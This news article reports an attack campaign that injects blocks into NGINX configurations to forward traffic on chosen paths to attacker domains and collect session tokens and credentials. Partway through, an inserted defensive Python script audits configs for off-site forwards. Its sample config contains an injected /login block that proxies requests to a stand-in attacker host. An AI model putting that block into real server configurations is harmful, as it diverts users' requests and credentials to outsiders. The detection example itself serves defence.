NGINX servers hijacked in global campaign to redirect traffic
Redirected traffic can be abused in multiple ways, experts warn
- DataDog reports attackers hijacking NGINX configurations to reroute traffic through malicious infrastructure
- Campaign targets Asian government and education sectors, enabling theft of session tokens, cookies, and credentials
- Hijacked traffic used for phishing, malware injection, ad fraud, and proxying further attacks
Cybercriminals are targeting NGINX servers, rerouting legitimate traffic through their malicious infrastructure, experts have warned.
Security researchers at DataDog Security Labs found the attackers are focused primarily on Asian targets in the government and education industries.
NGINX servers are software systems that sit in front of websites or apps and handle incoming web traffic. They serve content, balance loads, and route requests to the appropriate backend servers.
What to do with the stolen data
In the attack, the unnamed threat actors modify the NGINX configuration files and inject malicious blocks that capture incoming requests for selected paths. The requests are then rewritten to carry the original URL and forwarded to domains under the attackers' control. According to DataDog, this is a five-stage attack that starts with configuration injection and ends with data exfiltration.
Since no vulnerability is being exploited here, and the victims still end up on the pages they asked for, no one is any the wiser. Still, cybercriminals are getting away with valuable information that can be used in different ways.
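As a defender-side illustration of the configuration injection described above (an added example, not Datadog's or the article's code): a small Python audit that scans NGINX configuration text and flags `proxy_pass`, `return 30x` and `rewrite` directives whose target host is not local, not a declared upstream and not on an allowlist. The sample configuration and the host `hijack.example.invalid` are constructed for this example.

```python
"""Audit NGINX config text for proxy/redirect directives that send requests
to hosts outside an allowlist. Sample config and its hosts are constructed."""
import re
from urllib.parse import urlparse

# proxy_pass / return 30x / rewrite REGEX   TARGET [flags];
FORWARD_RE = re.compile(
    r'(?:^|[{;\s])(proxy_pass|return\s+30[1278]|rewrite\s+\S+)\s+(\S+?)(?:\s+\S+?)*;')
LOCATION_RE = re.compile(r'location\s+(?:[=~*^]+\s+)?(\S+)\s*\{')
UPSTREAM_RE = re.compile(r'upstream\s+(\S+)\s*\{')
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def extract_host(target):
    """Host of a forward target; None for relative URIs, unix: sockets and
    hosts that are entirely an NGINX variable (decided at runtime)."""
    if target.startswith("unix:"):
        return None
    host = urlparse(target if "://" in target else "//" + target).hostname or ""
    # "hijack.example.invalid$request_uri" -> "hijack.example.invalid"
    return host.split("$")[0] or None

def audit_nginx_config(config_text, allowed_hosts):
    """Return [(location, directive, target)] for every forward whose host is
    not local, not a declared upstream and not allow-listed."""
    upstreams = set(UPSTREAM_RE.findall(config_text))
    findings, location = [], "(none)"
    for line in config_text.splitlines():
        loc = LOCATION_RE.search(line)
        if loc:
            location = loc.group(1)
        elif line.strip() == "}":   # best-effort block tracking
            location = "(none)"
        m = FORWARD_RE.search(line)
        if not m:
            continue
        directive, target = m.group(1).split()[0], m.group(2)
        host = extract_host(target)
        if host and host not in LOCAL_HOSTS | upstreams | set(allowed_hosts):
            findings.append((location, directive, target))
    return findings

# Constructed sample: a real upstream, an allow-listed CDN redirect, and an
# injected /login block forwarding off-site with the original URI attached.
SAMPLE_CONFIG = """upstream app_backend { server 10.0.0.5:8080; }
server {
    location / { proxy_pass http://app_backend; }
    location /static/ { return 301 https://cdn.example.edu$request_uri; }
    location /login {
        proxy_pass http://hijack.example.invalid$request_uri;
    }
}"""
```

Running `audit_nginx_config(SAMPLE_CONFIG, {"cdn.example.edu"})` reports only the injected `/login` block; the same scan over every file under `/etc/nginx/` is a cheap integrity check to pair with file-change monitoring.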
Because headers are preserved, the attacker can collect IP addresses, user agents, referrers, session tokens, cookies, and sometimes credentials or API keys if they appear in requests. On government or .edu sites, that data is especially valuable.
They can also manipulate content selectively. Since only certain URL paths are hijacked, the attacker can inject ads, phishing pages, malware downloads, or fake login prompts only when they choose to, targeting specific users, regions, or time zones.
Then, there is the option of traffic monetization and resale. Clean, real user traffic routed through attacker infrastructure can be sold for ad fraud, SEO manipulation, click-fraud, or used to boost other malicious services, which is a common practice in large-scale proxy ecosystems.
Finally, compromised NGINX servers can be used to proxy attacks against other targets, effectively masking their origins.
Via BleepingComputer

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.